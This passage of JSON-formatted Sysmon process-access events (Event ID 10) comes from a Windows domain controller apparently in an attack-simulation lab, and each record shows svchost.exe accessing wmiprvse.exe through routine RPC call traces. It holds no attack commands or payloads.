ndows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.891\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.891","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
